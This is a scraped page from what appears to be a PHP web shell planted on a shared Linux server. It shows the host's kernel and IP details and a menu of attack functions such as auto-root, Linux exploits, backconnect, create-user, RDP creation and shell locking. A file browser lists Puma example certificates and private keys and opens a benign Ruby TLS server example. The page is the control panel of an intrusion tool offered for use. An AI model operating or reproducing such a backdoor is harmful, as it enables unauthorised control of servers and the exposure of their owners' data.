Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
puma /
examples /
puma /
client-certs /
[ HOME SHELL ]
Name
Size
Permission
Action
ca.crt
1.09
KB
-rw-r--r--
ca.key
1.64
KB
-rw-r--r--
client.crt
1.08
KB
-rw-r--r--
client.key
1.64
KB
-rw-r--r--
client_expired.crt
1.08
KB
-rw-r--r--
client_expired.key
1.64
KB
-rw-r--r--
client_unknown.crt
1.08
KB
-rw-r--r--
client_unknown.key
1.64
KB
-rw-r--r--
generate_client_test.rb
4.64
KB
-rw-r--r--
keystore.jks
3.65
KB
-rw-r--r--
run_server_with_certs.rb
719
B
-rw-r--r--
server.crt
1.08
KB
-rw-r--r--
server.key
1.64
KB
-rw-r--r--
server.p12
3.19
KB
-rw-r--r--
unknown_ca.crt
1.1
KB
-rw-r--r--
unknown_ca.key
1.64
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : run_server_with_certs.rb
require "bundler/setup" require "puma" require "puma/detect" require "puma/puma_http11" require "puma/minissl" app = proc {|env| p env['puma.peercert'] [200, {}, [ env['puma.peercert'] ]] } events = Puma::Events.new($stdout, $stderr) server = Puma::Server.new(app, events) context = Puma::MiniSSL::Context.new context.key = "certs/server.key" context.cert = "certs/server.crt" context.ca = "certs/ca.crt" #context.verify_mode = Puma::MiniSSL::VERIFY_NONE #context.verify_mode = Puma::MiniSSL::VERIFY_PEER context.verify_mode = Puma::MiniSSL::VERIFY_PEER | Puma::MiniSSL::VERIFY_FAIL_IF_NO_PEER_CERT server.add_ssl_listener("127.0.0.1", 4000, context) server.run sleep #server.stop(true)
Close